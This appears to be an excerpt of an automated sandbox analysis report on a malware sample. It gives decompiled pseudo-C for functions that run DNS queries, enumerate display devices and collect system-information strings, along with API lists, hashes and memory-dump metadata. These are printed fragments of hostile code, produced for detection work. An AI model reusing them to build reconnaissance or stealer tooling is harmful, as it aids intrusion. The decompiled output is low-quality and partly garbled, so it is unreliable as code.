                                                                      C-Code - Quality: 33%
                                                                      			E00417E7C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				intOrPtr* _t36;
				intOrPtr _t40;
				intOrPtr* _t45;
				void* _t48;

				 *[cs:eax] =  *[cs:eax] + __eax;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				_push(_t48);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xfffffff4;
				_t45 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t45 != 0) {
					_v16 = 0;
					_t36 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t36 = 1;
					 *((intOrPtr*)(_t36 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t36);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t45() == 0) {
					}
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00417F29);
				return E004034E4( &_v8);
			}











                                                                      0x00417e7c
                                                                      0x00417e7f
                                                                      0x00417e89
                                                                      0x00417e8c
                                                                      0x00417e92
                                                                      0x00417e99
                                                                      0x00417e9a
                                                                      0x00417e9f
                                                                      0x00417ea2
                                                                      0x00417ebc
                                                                      0x00417ec0
                                                                      0x00417ec4
                                                                      0x00417ed1
                                                                      0x00417edd
                                                                      0x00417ee0
                                                                      0x00417ee9
                                                                      0x00417eec
                                                                      0x00417ef1
                                                                      0x00417ef2
                                                                      0x00417ef3
                                                                      0x00417ef5
                                                                      0x00417eff
                                                                      0x00417f04
                                                                      0x00417f04
                                                                      0x00417f04
                                                                      0x00417f0e
                                                                      0x00417f11
                                                                      0x00417f14
                                                                      0x00417f21

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                      • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: DnsQuery_A$dnsapi.dll
                                                                      • API String ID: 2574300362-3847274415
                                                                      • Opcode ID: 3cfbd1c39c90712b0f6f91fda7395d1ac3d24759ea385032c5fbcfaa3da3176a
                                                                      • Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
                                                                      • Opcode Fuzzy Hash: 3cfbd1c39c90712b0f6f91fda7395d1ac3d24759ea385032c5fbcfaa3da3176a
                                                                      • Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416644 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 32%
                                                                      			E00416644(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v268;
				char _v336;
				char _v340;
				char _v344;
				void* _t31;
				intOrPtr _t39;
				intOrPtr* _t43;
				void* _t46;

				_v340 = 0;
				_v344 = 0;
				_t43 = __eax;
				_push(_t46);
				_push(0x41670d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffeac;
				_v8 = GetProcAddress(LoadLibraryA("user32.dll"), "EnumDisplayDevicesW");
				_v336 = 0x148;
				_t31 = 0;
				while(1) {
					_push(0);
					_push( &_v336);
					_push(_t31);
					_push(0);
					if(_v8() == 0) {
						break;
					}
					_t31 = _t31 + 1;
					_push( *_t43);
					E00403D10( &_v344, 0x80,  &_v268);
					E0040377C( &_v340, _v344);
					_push(_v340);
					_push(E00416744);
					E00403850();
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00416714);
				E00403B80( &_v344);
				return E004034E4( &_v340);
			}












                                                                      0x00416652
                                                                      0x00416658
                                                                      0x0041665e
                                                                      0x00416662
                                                                      0x00416663
                                                                      0x00416668
                                                                      0x0041666b
                                                                      0x00416683
                                                                      0x00416686
                                                                      0x00416692
                                                                      0x004166d7
                                                                      0x004166d7
                                                                      0x004166de
                                                                      0x004166df
                                                                      0x004166e0
                                                                      0x004166e7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00416696
                                                                      0x00416697
                                                                      0x004166aa
                                                                      0x004166bb
                                                                      0x004166c0
                                                                      0x004166c6
                                                                      0x004166d2
                                                                      0x004166d2
                                                                      0x004166eb
                                                                      0x004166ee
                                                                      0x004166f1
                                                                      0x004166fc
                                                                      0x0041670c

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: EnumDisplayDevicesW$user32.dll
                                                                      • API String ID: 2574300362-1693391355
                                                                      • Opcode ID: af34b5e80eadff1b2987b13dc2e651b6a133270980b26e7b502f8b40db48fb95
                                                                      • Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
                                                                      • Opcode Fuzzy Hash: af34b5e80eadff1b2987b13dc2e651b6a133270980b26e7b502f8b40db48fb95
                                                                      • Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00417E80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 29%
                                                                      			E00417E80(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t43;
				void* _t46;

				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				_push(_t46);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				_t43 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t43 != 0) {
					_v16 = 0;
					_t34 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t34 = 1;
					 *((intOrPtr*)(_t34 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t34);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t43() == 0) {
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00417F29);
				return E004034E4( &_v8);
			}










                                                                      0x00417e89
                                                                      0x00417e8c
                                                                      0x00417e92
                                                                      0x00417e99
                                                                      0x00417e9a
                                                                      0x00417e9f
                                                                      0x00417ea2
                                                                      0x00417ebc
                                                                      0x00417ec0
                                                                      0x00417ec4
                                                                      0x00417ed1
                                                                      0x00417edd
                                                                      0x00417ee0
                                                                      0x00417ee9
                                                                      0x00417eec
                                                                      0x00417ef1
                                                                      0x00417ef2
                                                                      0x00417ef3
                                                                      0x00417ef5
                                                                      0x00417eff
                                                                      0x00417f04
                                                                      0x00417f04
                                                                      0x00417f04
                                                                      0x00417f0e
                                                                      0x00417f11
                                                                      0x00417f14
                                                                      0x00417f21

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                      • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: DnsQuery_A$dnsapi.dll
                                                                      • API String ID: 2574300362-3847274415
                                                                      • Opcode ID: 1f81088a46c0324dda660dd481f614bad9869b2585b748a82db9a8fe1a613a36
                                                                      • Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
                                                                      • Opcode Fuzzy Hash: 1f81088a46c0324dda660dd481f614bad9869b2585b748a82db9a8fe1a613a36
                                                                      • Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040246C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 71%
                                                                      			E0040246C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr _t36;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t47;

				_t45 = _t47;
				_t42 = __edx;
				_t25 = __eax;
				if( *0x41c5ac != 0 || E00401870() != 0) {
					_push(_t45);
					_push("�^");
					_push( *[fs:edx]);
					 *[fs:edx] = _t47;
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011CC();
					}
					if(E00402290(_t25, _t42) == 0) {
						_t39 = E00401F5C(_t42);
						_t15 = ( *(_t25 - 4) & 0x7ffffffc) - 4;
						if(_t42 < ( *(_t25 - 4) & 0x7ffffffc) - 4) {
							_t15 = _t42;
						}
						if(_t39 != 0) {
							E00402628(_t25, _t15, _t39);
							E004020EC(_t25);
						}
						_v8 = _t39;
					} else {
						_v8 = _t25;
					}
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E00402524);
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011D4();
						return 0;
					}
					return 0;
				} else {
					_v8 = 0;
					return _v8;
				}
			}












                                                                      0x0040246d
                                                                      0x00402473
                                                                      0x00402475
                                                                      0x0040247e
                                                                      0x00402495
                                                                      0x00402496
                                                                      0x0040249b
                                                                      0x0040249e
                                                                      0x004024a8
                                                                      0x004024aa
                                                                      0x004024af
                                                                      0x004024af
                                                                      0x004024bf
                                                                      0x004024cd
                                                                      0x004024db
                                                                      0x004024e0
                                                                      0x004024e2
                                                                      0x004024e2
                                                                      0x004024e6
                                                                      0x004024ed
                                                                      0x004024f4
                                                                      0x004024f4
                                                                      0x004024f9
                                                                      0x004024c1
                                                                      0x004024c1
                                                                      0x004024c1
                                                                      0x004024fe
                                                                      0x00402501
                                                                      0x00402504
                                                                      0x00402510
                                                                      0x00402512
                                                                      0x00402517
                                                                      0x00000000
                                                                      0x00402517
                                                                      0x0040251c
                                                                      0x00402489
                                                                      0x0040248b
                                                                      0x0040252c
                                                                      0x0040252c

                                                                      APIs
                                                                      • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                                                                      • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                                                                        • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                        • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                        • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                        • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.512514270.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_400000_6CJfScEKhr.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                      • String ID: ^
                                                                      • API String ID: 2227675388-551292248
                                                                      • Opcode ID: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                      • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                                                                      • Opcode Fuzzy Hash: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                      • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Function 04A7C428 Relevance: 4.9, Strings: 3, Instructions: 1115COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4$Xc'm$Xc'm
                                                                      • API String ID: 0-95617288
                                                                      • Opcode ID: 9b9a02deb43801d28b1654d16e06768c8b6f70025c1c1c6be92fc170ba28734a
                                                                      • Instruction ID: 1e4951edc3afa571e8ce192c81492bf172618b924e89c5dc4dcd5319075ec87a
                                                                      • Opcode Fuzzy Hash: 9b9a02deb43801d28b1654d16e06768c8b6f70025c1c1c6be92fc170ba28734a
                                                                      • Instruction Fuzzy Hash: 28B20734A00218CFDB24DFA4C994BADB7B6EF48314F1180A5E906AB3A5DB74ED85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7C768 Relevance: 3.0, Strings: 2, Instructions: 507COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4$Xc'm
                                                                      • API String ID: 0-3079049320
                                                                      • Opcode ID: ed6515182a41c11975e56f96378616726f15adabeba6c11b40070ecf23ac1e5f
                                                                      • Instruction ID: 466bb25c71532522cdfc2d9ef5eb7ccdf93360f34467d8b37a0b95a30cd6b1e7
                                                                      • Opcode Fuzzy Hash: ed6515182a41c11975e56f96378616726f15adabeba6c11b40070ecf23ac1e5f
                                                                      • Instruction Fuzzy Hash: C132F874A00218CFDB64DFA4C984BADB7B6FF48314F1184A9D909AB265DB34ED86CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7F828 Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <n'm$\"m
                                                                      • API String ID: 0-3720080307
                                                                      • Opcode ID: a33978c929cde246217d0b3b592647473b622781e335dc7cfc094149d21db099
                                                                      • Instruction ID: 0d9cc93df652e4338fda775856da91d4aff23722e59cc96587348cf29e6c1be4
                                                                      • Opcode Fuzzy Hash: a33978c929cde246217d0b3b592647473b622781e335dc7cfc094149d21db099
                                                                      • Instruction Fuzzy Hash: A97137347002058FDB14DF69C894AAA77FAAF89744B1584A5E902CF378EF30ED41DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B0C90 Relevance: .7, Instructions: 721COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd58c04d5344b98208c677ec4b3c3977e365850176fd7c48226186374e781659
                                                                      • Instruction ID: 5083be4b4598644765f3c00ddf9ee65b1c93a2208c8657ac2974205e45aa4b9e
                                                                      • Opcode Fuzzy Hash: dd58c04d5344b98208c677ec4b3c3977e365850176fd7c48226186374e781659
                                                                      • Instruction Fuzzy Hash: 85523675A10114DFDB15CFA8C994FA9BBB2FF48304F1585A8E50AAB266CB31EC91CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7F040 Relevance: .5, Instructions: 544COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fec9fdb3b549caa648de5f4222de1b25f59194ae3c1fce94c08849663437f54b
                                                                      • Instruction ID: 2f383e7f6e84566dd54b70697ffac8ad04c83a65238bc1d48e83fbf6c55aad0c
                                                                      • Opcode Fuzzy Hash: fec9fdb3b549caa648de5f4222de1b25f59194ae3c1fce94c08849663437f54b
                                                                      • Instruction Fuzzy Hash: A6224B35B002049FDB24DF68D890AADB7F2EF88314F158069E905EB3A5DB75EE41CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B0C8A Relevance: .3, Instructions: 315COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08db9ce3d686bf2985e909e7d3d888e0eac1795fe17ff41363666270db0b29b9
                                                                      • Instruction ID: e4b6b4ec6a0096918d233d61178ac40f15f055ca318ec4a3ee71bdad6e24c9cd
                                                                      • Opcode Fuzzy Hash: 08db9ce3d686bf2985e909e7d3d888e0eac1795fe17ff41363666270db0b29b9
                                                                      • Instruction Fuzzy Hash: 67D16871A102289FDB15CFA8D994BADBBF1FF48344F1185A9E409EB265DB30AD81CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B0730 Relevance: .1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1edb09650c2ebad0e9f7b2e343ea817f102b7e7f09868d115b7dc7092089bbe0
                                                                      • Instruction ID: 91a0d2c0cb08ffb36587de1e81439f25f7ff1e7bf9a3440eee2bc1e0b944a1a8
                                                                      • Opcode Fuzzy Hash: 1edb09650c2ebad0e9f7b2e343ea817f102b7e7f09868d115b7dc7092089bbe0
                                                                      • Instruction Fuzzy Hash: 6761A2B4E012099FCB05CFAAC5849DEFBB2BF88304F25916AD815AB255D730AA41CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7E450 Relevance: 3.0, Strings: 2, Instructions: 531COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xc'm$Xc'm
                                                                      • API String ID: 0-1446526846
                                                                      • Opcode ID: 3cab9762a6f2aa3231aafaa843598d09fb3110af9ef8589b0715718a2b83bc85
                                                                      • Instruction ID: 3707ae7687e4df4c1effe4cbfcf728c17d95ce6f73bf34b93693d2c1df2cdf23
                                                                      • Opcode Fuzzy Hash: 3cab9762a6f2aa3231aafaa843598d09fb3110af9ef8589b0715718a2b83bc85
                                                                      • Instruction Fuzzy Hash: 69228B75E00219CFDB25DFA4C850AAEBBF2FF48305F148495E811AB295DB78ED42CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7B900 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xc'm
                                                                      • API String ID: 0-2359960232
                                                                      • Opcode ID: 873ded6e23ffe1e8cc4f53e1d9b2774b65e6ad6c335f3fab404692212d13a336
                                                                      • Instruction ID: 8f208813a6b7ecbfa4c1306ecdbf8a2ce8b1be282619badcf98f9314584cf3b5
                                                                      • Opcode Fuzzy Hash: 873ded6e23ffe1e8cc4f53e1d9b2774b65e6ad6c335f3fab404692212d13a336
                                                                      • Instruction Fuzzy Hash: 1351C0757401148FCB14DF69C850AAEBBA6EF89315B15807AEA05DF362CB31EC01CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BBDC8 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 7
                                                                      • API String ID: 0-1790921346
                                                                      • Opcode ID: c1853c834db6d327179b9b736cb629d052b693d98781902499d2defe69b4e561
                                                                      • Instruction ID: 13ead8e055bbc5e3f1efa675525b0804d06ff4b804da7db0b0d41a74ebe24a71
                                                                      • Opcode Fuzzy Hash: c1853c834db6d327179b9b736cb629d052b693d98781902499d2defe69b4e561
                                                                      • Instruction Fuzzy Hash: A0410435E10219DFCB12AFE4D8019FEBBB2EF88394F008419FA16AB265C7359D11CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B7770 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 7
                                                                      • API String ID: 0-1790921346
                                                                      • Opcode ID: 51074554d160d6cb53a9ad0fc86017f51f1879201e1f013a3ec412e610c411a5
                                                                      • Instruction ID: 4367b7f24a1f3aaf3c0583645aea8a8ba02743982c4b0156a34d66653019d6d4
                                                                      • Opcode Fuzzy Hash: 51074554d160d6cb53a9ad0fc86017f51f1879201e1f013a3ec412e610c411a5
                                                                      • Instruction Fuzzy Hash: 283128316286449FC717ABE494505FEBBA6DFC134470445A9C40A9F64ADF348D06DB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B0429 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: t%#m
                                                                      • API String ID: 0-1983186520
                                                                      • Opcode ID: e45f8198ee710699120320ddc01f39f11aaae75d6b2f4764dc74cbd579d43829
                                                                      • Instruction ID: c4c2e4ed1fca5963791f330a4f422e1ab3229144786a5e996d037abadab6ddfa
                                                                      • Opcode Fuzzy Hash: e45f8198ee710699120320ddc01f39f11aaae75d6b2f4764dc74cbd579d43829
                                                                      • Instruction Fuzzy Hash: 1C218170D082498FCB06DFB8D8555EDBFB0FF86305B0655AAC045E7162DB741A0ACB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B0448 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: t%#m
                                                                      • API String ID: 0-1983186520
                                                                      • Opcode ID: 22bee630cd460b5d6cf04a694bb15228a2e1f1877b0c4a8c71f167bdea616a2d
                                                                      • Instruction ID: 1c25fd69744353fb55c78cc7b7995b0f9cb13a1b0766be5c47c414b5e289917b
                                                                      • Opcode Fuzzy Hash: 22bee630cd460b5d6cf04a694bb15228a2e1f1877b0c4a8c71f167bdea616a2d
                                                                      • Instruction Fuzzy Hash: E1113570D0020A8FCB04EFB9D8595EEBBB5FF8A306F11A42AD109B3250EB741A45CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B78D8 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: R
                                                                      • API String ID: 0-1466425173
                                                                      • Opcode ID: bee78f53b2fe99c98ee6c4b84deed2041caaa235f8a8dfccdc147e63c216e64f
                                                                      • Instruction ID: b7906f9b732e0d04c3d52b5e5d367ad7baaf9baa6b0b7b8eea24cb91d0b26e82
                                                                      • Opcode Fuzzy Hash: bee78f53b2fe99c98ee6c4b84deed2041caaa235f8a8dfccdc147e63c216e64f
                                                                      • Instruction Fuzzy Hash: 99E04FA18092486FC742EBE4D840ADBBBE99F42219F2045EA8448CB113E6304A0497A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3DC00 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: L
                                                                      • API String ID: 0-2909332022
                                                                      • Opcode ID: beb31d11f703343569ed9f630eccbce98e93280e8fc136f1f0499412584c5f69
                                                                      • Instruction ID: 92e2bea46da3072afd9c56ccc62f18dc4c884b083f550f1d0331430ac004e1aa
                                                                      • Opcode Fuzzy Hash: beb31d11f703343569ed9f630eccbce98e93280e8fc136f1f0499412584c5f69
                                                                      • Instruction Fuzzy Hash: A3C08CB96000006BC340EA24C882846FBE9EBA8241B21C83CD41887285CEB29807CB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3BB60 Relevance: .8, Instructions: 782COMMON
                                                                      Download Yara Rule
